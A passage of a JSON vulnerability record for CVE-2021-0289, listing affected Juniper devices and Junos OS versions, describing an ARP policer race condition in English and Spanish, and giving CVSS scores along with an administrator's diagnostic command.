"cpe:2.3:h:juniper:ptx10004:-:*:*:*:*:*:*:*", "matchCriteriaId": "C432E543-37F5-4CA0-B239-2B97C6A16907", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx10008:-:*:*:*:*:*:*:*", "matchCriteriaId": "65A64A26-4606-4D33-8958-5A3B7FFC4CDB", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx10016:-:*:*:*:*:*:*:*", "matchCriteriaId": "1879799F-18B2-4958-AA90-FD19348C889F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "516476F9-7D4C-494F-99AA-750F4467CD15", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx5000:-:*:*:*:*:*:*:*", "matchCriteriaId": "654140A0-FEC0-4DB4-83BF-ECCB000DFA4D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx10000:-:*:*:*:*:*:*:*", "matchCriteriaId": "5AF2039C-E08C-472F-82E6-DAD3F94724B5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx10002:-:*:*:*:*:*:*:*", "matchCriteriaId": "F1401145-D8EC-4DB9-9CDE-9DE6C0D000C5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx10002-32q:-:*:*:*:*:*:*:*", "matchCriteriaId": "17E59530-3262-4BDC-915C-0B8D2EED7784", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx10002-60c:-:*:*:*:*:*:*:*", "matchCriteriaId": "626CA614-72D4-4A8B-9C38-275C7A7F8D85", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx10002-72q:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0FF30F4-3D10-4AD6-9643-5826A11C7629", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx10008:-:*:*:*:*:*:*:*", "matchCriteriaId": "1453E42A-77B3-4922-8EC3-1A5668C39550", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx10016:-:*:*:*:*:*:*:*", "matchCriteriaId": "26408465-BD6A-4416-B98E-691A5F651080", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx3000-g:-:*:*:*:*:*:*:*", "matchCriteriaId": "79C98F71-042D-412D-8064-FF8E27CAB9D2", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx3000-m:-:*:*:*:*:*:*:*", "matchCriteriaId": "3110C458-EFBA-4221-9417-015B7D5874C3", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx3008-i:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0727FD0-F5A2-4156-BBDB-F4AE6E6F1B89", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx3100:-:*:*:*:*:*:*:*", "matchCriteriaId": "858482CF-E310-4F6C-8ECC-C9BFBA3E1EC5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx3500:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A336BD3-4AB0-4E9E-8AD5-E6413A5A53FC", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx3600:-:*:*:*:*:*:*:*", "matchCriteriaId": "7F4D44B0-E6CE-4380-8712-AC832DBCB424", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx3600-i:-:*:*:*:*:*:*:*", "matchCriteriaId": "F6F6C1E3-9390-4E06-AA62-02C99447FDB4", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx5100:-:*:*:*:*:*:*:*", "matchCriteriaId": "E974B4BC-64C5-4BB6-AF31-D46AF3763416", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx5100-96s:-:*:*:*:*:*:*:*", "matchCriteriaId": "6BD0F680-ED30-48F3-A5D9-988D510CFC0D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx5110:-:*:*:*:*:*:*:*", "matchCriteriaId": "79A8847B-4F98-4949-8639-5CD2B411D10F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx5120:-:*:*:*:*:*:*:*", "matchCriteriaId": "09EBDE4B-764F-4DF1-844A-BB8A52CD53EF", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx5130:-:*:*:*:*:*:*:*", "matchCriteriaId": "AB58A6E9-FFCF-4331-AC3B-45C37BD1943E", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx5200:-:*:*:*:*:*:*:*", "matchCriteriaId": "EDC5478F-A047-4F6D-BB11-0077A74C0174", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx5200-32c:-:*:*:*:*:*:*:*", "matchCriteriaId": "38D790AD-D00F-4FED-96FE-3046C827356B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx5200-48y:-:*:*:*:*:*:*:*", "matchCriteriaId": "BAD9AD5C-947D-41EF-9969-FCCEB144984F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx5210:-:*:*:*:*:*:*:*", "matchCriteriaId": "D877320D-1997-4B66-B11B-864020C755E1", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx5210-64c:-:*:*:*:*:*:*:*", "matchCriteriaId": "B86047DE-A0A0-4698-9414-B66C0FA7B544", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:qfx5220:-:*:*:*:*:*:*:*", "matchCriteriaId": "D193BEBD-9436-468D-B89E-D5720603451D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:router_m10:-:*:*:*:*:*:*:*", "matchCriteriaId": "0F5BF9C1-F81A-487F-A748-94D6FFFEE454", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:router_m16:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD2B717B-9637-4FA3-9361-315941D95BEC", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:router_m20:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA345A17-CB56-4252-AC1E-EDF2F91A80FA", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:router_m40:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0960F82-AF63-4047-BB4A-44BC4A4E4B3F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:router_m5:-:*:*:*:*:*:*:*", "matchCriteriaId": "493A0970-104C-4485-8067-973931CD6067", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:secure_access_2000:-:*:*:*:*:*:*:*", "matchCriteriaId": "DF6B885A-5C17-4928-A1B9-4A729F277F4B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:secure_access_2500:-:*:*:*:*:*:*:*", "matchCriteriaId": "82E5E8BD-68B9-4C94-A1F0-3F5C3EC7620A", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:secure_access_4000:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D6A2465-451A-436A-89C1-94424A0C4AB8", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:secure_access_4500:-:*:*:*:*:*:*:*", "matchCriteriaId": "641091CF-F671-4AD7-B10F-E50497AC462B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:secure_access_6000:-:*:*:*:*:*:*:*", "matchCriteriaId": "501D212B-D846-4D43-B6D8-F01C2483AB64", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:secure_access_6500:-:*:*:*:*:*:*:*", "matchCriteriaId": "075FD895-451D-4959-9A73-94F5BB1853E6", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:secure_access_700:-:*:*:*:*:*:*:*", "matchCriteriaId": "42FB27DD-D685-4D5E-8DAF-7A34DE33AB59", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:t1600:-:*:*:*:*:*:*:*", "matchCriteriaId": "6B6E6B57-BFF3-4AD2-979A-B2C4FD9F138E", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:t320:-:*:*:*:*:*:*:*", "matchCriteriaId": "9B52F913-266E-44CB-BFA3-85AC9D55FF1A", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:t4000:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0B57FF1-D4F8-4E28-95A7-2D29DF65D825", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:t640:-:*:*:*:*:*:*:*", "matchCriteriaId": "12CCEFE5-F37B-482D-8670-DA40EFBB7E42", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:xre200:-:*:*:*:*:*:*:*", "matchCriteriaId": "5542E06B-EC81-47A8-AB09-55DBE0560D1C", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:juniper:junos:18.4:-:*:*:*:*:*:*", "matchCriteriaId": "74CA9010-D3DE-487B-B46F-589A48AB0F0A", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1:*:*:*:*:*:*", "matchCriteriaId": "A38F224C-8E9B-44F3-9D4F-6C9F04F57927", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "853F146A-9A0F-49B6-AFD2-9907434212F1", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "8F73B88B-E66C-4ACD-B38D-9365FB230ABA", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s3:*:*:*:*:*:*", "matchCriteriaId": "EE1F82EC-3222-4158-8923-59CDA1909A9C", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s4:*:*:*:*:*:*", "matchCriteriaId": "8FE95D15-B5E5-4E74-9464-C72D8B646A6B", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s5:*:*:*:*:*:*", "matchCriteriaId": "C012CD07-706A-4E1C-B399-C55AEF5C8309", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s6:*:*:*:*:*:*", "matchCriteriaId": "A0C26E59-874A-4D87-9E7F-E366F4D65ED1", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s7:*:*:*:*:*:*", "matchCriteriaId": "75902119-60D0-49F8-8E01-666E0F75935A", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2:*:*:*:*:*:*", "matchCriteriaId": "D59D7A31-128B-4034-862B-8EF3CE3EE949", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "0C5E097B-B79E-4E6A-9291-C8CB9674FED5", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "819FA3ED-F934-4B20-BC0E-D638ACCB7787", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "3D7D773A-4988-4D7C-A105-1885EBE14426", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s4:*:*:*:*:*:*", "matchCriteriaId": "1BD93674-9375-493E-BD6C-8AD41CC75DD4", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s5:*:*:*:*:*:*", "matchCriteriaId": "34E28FD9-1089-42F7-8586-876DBEC965DE", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s6:*:*:*:*:*:*", "matchCriteriaId": "B7E72C49-1849-4A6F-81BC-D03F06D47D6D", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s7:*:*:*:*:*:*", "matchCriteriaId": "541535BD-20DC-4489-91A7-F6CBC6802352", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s8:*:*:*:*:*:*", "matchCriteriaId": "924C4EAC-2A52-45A9-BE0F-B62F070C3E3D", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3:*:*:*:*:*:*", "matchCriteriaId": "736B7A9F-E237-45AF-A6D6-84412475F481", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s1:*:*:*:*:*:*", "matchCriteriaId": "62E63730-F697-4FE6-936B-FD9B4F22EAE8", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s2:*:*:*:*:*:*", "matchCriteriaId": "064A7052-4EF5-4BFB-88FF-8122AEECB6A7", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s3:*:*:*:*:*:*", "matchCriteriaId": "08C58CCB-3BAA-4400-B371-556DF46DE69C", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s4:*:*:*:*:*:*", "matchCriteriaId": "28F7740D-C636-4FA3-8479-E5E039041DA6", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s5:*:*:*:*:*:*", "matchCriteriaId": "81F6DEA3-F07E-4FD0-87CB-4E8C0B768706", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s6:*:*:*:*:*:*", "matchCriteriaId": "2C1601BB-CAB7-4C92-8416-1824BB85D820", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s7:*:*:*:*:*:*", "matchCriteriaId": "14FC491D-8DA8-4E79-A9A6-3629E41C847A", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s8:*:*:*:*:*:*", "matchCriteriaId": "44C4BE2C-814F-49AA-8B64-17245FC01270", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r1:*:*:*:*:*:*", "matchCriteriaId": "DC743EE4-8833-452A-94DB-655BF139F883", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "FE96A8EA-FFE3-4D8F-9266-21899149D634", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "C12A75C6-2D00-4202-B861-00FF71585FA0", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r1-s3:*:*:*:*:*:*", "matchCriteriaId": "70FF3DD4-14CB-435D-8529-0480EB853F60", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r2:*:*:*:*:*:*", "matchCriteriaId": "4DCFA774-96EF-4018-82CF-95C807025C24", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "76022948-4B07-43CB-824C-44E1AB3537CB", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "25446F60-5CB9-4923-BCE8-609AE3CFDFBC", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "A23E5CEA-EFF5-4641-BC47-BA2D0859F0EE", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r3:*:*:*:*:*:*", "matchCriteriaId": "758275F3-9457-45A2-8F57-65DCD659FC1B", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r3-s1:*:*:*:*:*:*", "matchCriteriaId": "B46CB928-78B5-4D60-B747-9A0988C7060D", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r3-s2:*:*:*:*:*:*", "matchCriteriaId": "ED73BF1A-96E4-49F1-A6AA-7B29DAA6C112", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r3-s3:*:*:*:*:*:*", "matchCriteriaId": "0886EFA6-47E3-4C1D-A278-D3891A487FED", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r1:*:*:*:*:*:*", "matchCriteriaId": "8328FDE6-9707-4142-B905-3B07C0E28E35", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "41CD982F-E6F2-4951-9F96-A76C142DF08E", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "19FDC05F-5582-4F7E-B628-E58A3C0E7F2F", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r1-s3:*:*:*:*:*:*", "matchCriteriaId": "401306D1-E9CE-49C6-8DC9-0E8747B9DC2C", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r1-s4:*:*:*:*:*:*", "matchCriteriaId": "615EAF48-AD53-4CC2-B233-5EA5C0F72CB1", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r2:*:*:*:*:*:*", "matchCriteriaId": "DC8E7547-6649-436D-BC45-184417680C72", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "D9789FF8-D55C-4AF9-A250-E543A0EB826F", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r1:*:*:*:*:*:*", "matchCriteriaId": "CD07B7E2-F5C2-4610-9133-FDA9E66DFF4F", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "D3C23AEB-34DE-44FB-8D64-E69D6E8B7401", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "18DB9401-5A51-4BB3-AC2F-58F58F1C788C", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r1-s3:*:*:*:*:*:*", "matchCriteriaId": "06F53DA5-59AE-403C-9B1E-41CE267D8BB1", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r2:*:*:*:*:*:*", "matchCriteriaId": "3332262F-81DA-4D78-99C9-514CADA46611", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "B46B63A2-1518-4A29-940C-F05624C9658D", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "8E0D4959-3865-42A7-98CD-1103EBD84528", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "3A58292B-814C-49E7-8D6D-BE26EFB9ADDF", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r3:*:*:*:*:*:*", "matchCriteriaId": "681AE183-7183-46E7-82EA-28C398FA1C3D", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r3-s1:*:*:*:*:*:*", "matchCriteriaId": "8A6E9627-8BF1-4BE8-844B-EE8F1C9478F0", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.3:r1:*:*:*:*:*:*", "matchCriteriaId": "5C9BC697-C7C9-447D-9EBD-E9711462583E", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.3:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "7B80433B-57B1-49EF-B1A1-83781D6102E3", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.3:r2:*:*:*:*:*:*", "matchCriteriaId": "05D8427C-CDDE-4B2F-9CB8-41B9137660E4", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.4:r1:*:*:*:*:*:*", "matchCriteriaId": "20DDC6B7-BFC4-4F0B-8E68-442C23765BF2", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "037BA01C-3F5C-4503-A633-71765E9EF774", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:21.1:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "F462F4E3-762C-429F-8D25-5521100DD37C", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:juniper:srx100:-:*:*:*:*:*:*:*", "matchCriteriaId": "561C1113-3D59-4DD9-ADA7-3C9ECC4632EC", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx110:-:*:*:*:*:*:*:*", "matchCriteriaId": "78C6D8A0-92D3-4FD3-BCC1-CC7C87B76317", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx1400:-:*:*:*:*:*:*:*", "matchCriteriaId": "927EAB8B-EC3B-4B12-85B9-5517EBA49A30", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx1500:-:*:*:*:*:*:*:*", "matchCriteriaId": "2CEBF85C-736A-4E7D-956A-3E8210D4F70B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx210:-:*:*:*:*:*:*:*", "matchCriteriaId": "CD647C15-A686-4C8F-A766-BC29404C0FED", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx220:-:*:*:*:*:*:*:*", "matchCriteriaId": "45AB1622-1AED-4CD7-98F1-67779CDFC321", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx240:-:*:*:*:*:*:*:*", "matchCriteriaId": "89276D88-3B8D-4168-A2CD-0920297485F2", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx240h2:-:*:*:*:*:*:*:*", "matchCriteriaId": "E020556B-693F-4963-BA43-3164AB50FA49", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx300:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB5AB24B-2B43-43DD-AE10-F758B4B19F2A", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx320:-:*:*:*:*:*:*:*", "matchCriteriaId": "80F9DC32-5ADF-4430-B1A6-357D0B29DB78", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx340:-:*:*:*:*:*:*:*", "matchCriteriaId": "8B82D4C4-7A65-409A-926F-33C054DCBFBA", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx3400:-:*:*:*:*:*:*:*", "matchCriteriaId": "746C3882-2A5B-4215-B259-EB1FD60C513D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx345:-:*:*:*:*:*:*:*", "matchCriteriaId": "CE535749-F4CE-4FFA-B23D-BF09C92481E5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx3600:-:*:*:*:*:*:*:*", "matchCriteriaId": "DDE64EC0-7E42-43AF-A8FA-1A233BD3E3BC", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx380:-:*:*:*:*:*:*:*", "matchCriteriaId": "2305DA9D-E6BA-48F4-80CF-9E2DE7661B2F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx4000:-:*:*:*:*:*:*:*", "matchCriteriaId": "06A03463-6B1D-4DBA-9E89-CAD5E899B98B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx4100:-:*:*:*:*:*:*:*", "matchCriteriaId": "3AA8999C-8AE4-416F-BA2A-B1A21F33B4D7", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx4200:-:*:*:*:*:*:*:*", "matchCriteriaId": "CCC5F6F5-4347-49D3-909A-27A3A96D36C9", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx4600:-:*:*:*:*:*:*:*", "matchCriteriaId": "56BA6B86-D3F4-4496-AE46-AC513C6560FA", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx5000:-:*:*:*:*:*:*:*", "matchCriteriaId": "5ABA347C-3EF3-4F75-B4D1-54590A57C2BC", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx5400:-:*:*:*:*:*:*:*", "matchCriteriaId": "2FDDC897-747F-44DD-9599-7266F9B5B7B1", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx550:-:*:*:*:*:*:*:*", "matchCriteriaId": "62FC145A-D477-4C86-89E7-F70F52773801", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx550_hm:-:*:*:*:*:*:*:*", "matchCriteriaId": "06685D0E-A075-49A5-9EF4-34F0F795C8C6", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx550m:-:*:*:*:*:*:*:*", "matchCriteriaId": "52F0B735-8C49-4B08-950A-296C9CDE43CA", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx5600:-:*:*:*:*:*:*:*", "matchCriteriaId": "68CA098D-CBE4-4E62-9EC0-43E1B6098710", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx5800:-:*:*:*:*:*:*:*", "matchCriteriaId": "66F474D4-79B6-4525-983C-9A9011BD958B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:srx650:-:*:*:*:*:*:*:*", "matchCriteriaId": "8AA424D4-4DBF-4E8C-96B8-E37741B5403E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "When user-defined ARP Policer is configured and applied on one or more Aggregated Ethernet (AE) interface units, a Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability between the Device Control Daemon (DCD) and firewall process (dfwd) daemons of Juniper Networks Junos OS allows an attacker to bypass the user-defined ARP Policer. In this particular case the User ARP policer is replaced with default ARP policer. To review the desired ARP Policers and actual state one can run the command \"show interfaces \u003c\u003e extensive\" and review the output. See further details below. An example output is: show interfaces extensive | match policer Policer: Input: __default_arp_policer__ \u003c\u003c\u003c incorrect if user ARP Policer was applied on an AE interface and the default ARP Policer is displayed Policer: Input: jtac-arp-ae5.317-inet-arp \u003c\u003c\u003c correct if user ARP Policer was applied on an AE interface For all platforms, except SRX Series: This issue affects Juniper Networks Junos OS: All versions 5.6R1 and all later versions prior to 18.4 versions prior to 18.4R2-S9, 18.4R3-S9 with the exception of 15.1 versions 15.1R7-S10 and later versions; 19.4 versions prior to 19.4R3-S3; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S2; 20.3 version 20.3R1 and later versions; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2; This issue does not affect Juniper Networks Junos OS versions prior to 5.6R1. On SRX Series this issue affects Juniper Networks Junos OS: 18.4 versions prior to 18.4R2-S9, 18.4R3-S9; 19.4 versions prior to 19.4R3-S4; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S2; 20.3 version 20.3R1 and later versions; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2. This issue does not affect 18.4 versions prior to 18.4R1 on SRX Series. This issue does not affect Junos OS Evolved." }, { "lang": "es", "value": "Cuando se configura y aplica el ARP Policer definido por el usuario en una o m\u00e1s unidades de interfaz de Ethernet Agregada (AE), una vulnerabilidad de condici\u00f3n de carrera de tipo Time-of-check Time-of-use (TOCTOU) entre los demonios Device Control Daemon (DCD) y el proceso de firewall (dfwd) de Juniper Networks Junos OS permite a un atacante omitir el ARP Policer definido por el usuario. En este caso concreto, el ARP policer de usuario se sustituye por el ARP policer predeterminado. Para revisar los ARP Policers deseados y el estado real se puede ejecutar el comando \"show interfaces () extensive\" y revisar la salida. Vea m\u00e1s detalles a continuaci\u00f3n. Un ejemplo de salida es: show interfaces extensive | match policer Policer: Input: __default_arp_policer__ ((( incorrecto si se aplic\u00f3 ARP Policer de usuario en una interfaz AE y se muestra el ARP Policer por defecto Policer: Input: jtac-arp-ae5.317-inet-arp ((( correcto si se aplic\u00f3 ARP Policer de usuario en una interfaz AE Para todas las plataformas, excepto la serie SRX: Este problema afecta a Juniper Networks Junos OS: Todas las versiones 5.6R1 y todas las versiones posteriores, anteriores a 18.4 versiones anteriores a 18.4R2-S9, 18.4R3-S9 con la excepci\u00f3n de las versiones 15.1 15.1R7-S10 y posteriores; las versiones 19.4 anteriores a 19.4R3-S3; las versiones 20.1 anteriores a 20. 1R3; versiones 20.2 anteriores a 20.2R3-S2; 20.3 versi\u00f3n 20.3R1 y versiones posteriores; 20.4 versiones anteriores a 20.4R3; 21.1 versiones anteriores a 21.1R2; Este problema no afecta a versiones de Junos OS anteriores a 5.6R1. En la serie SRX, este problema afecta a Juniper Networks Junos OS: 18.4 versiones anteriores a 18.4R2-S9, 18.4R3-S9; 19.4 versiones anteriores a 19.4R3-S4; versiones 20.1 anteriores a 20.1R3; versiones 20.2 anteriores a 20.2R3-S2; 20.3 versi\u00f3n 20.3R1 y posteriores; 20.4 versiones anteriores a 20.4R3; 21.1 versiones anteriores a 21.1R2. Este problema no afecta a las versiones 18.4 anteriores a 18.4R1 en la serie SRX. Este problema no afecta a Junos OS Evolved" } ], "id": "CVE-2021-0289", "lastModified": "2024-11-21T05:42:24.760", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.9, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:A/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 5.5, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": 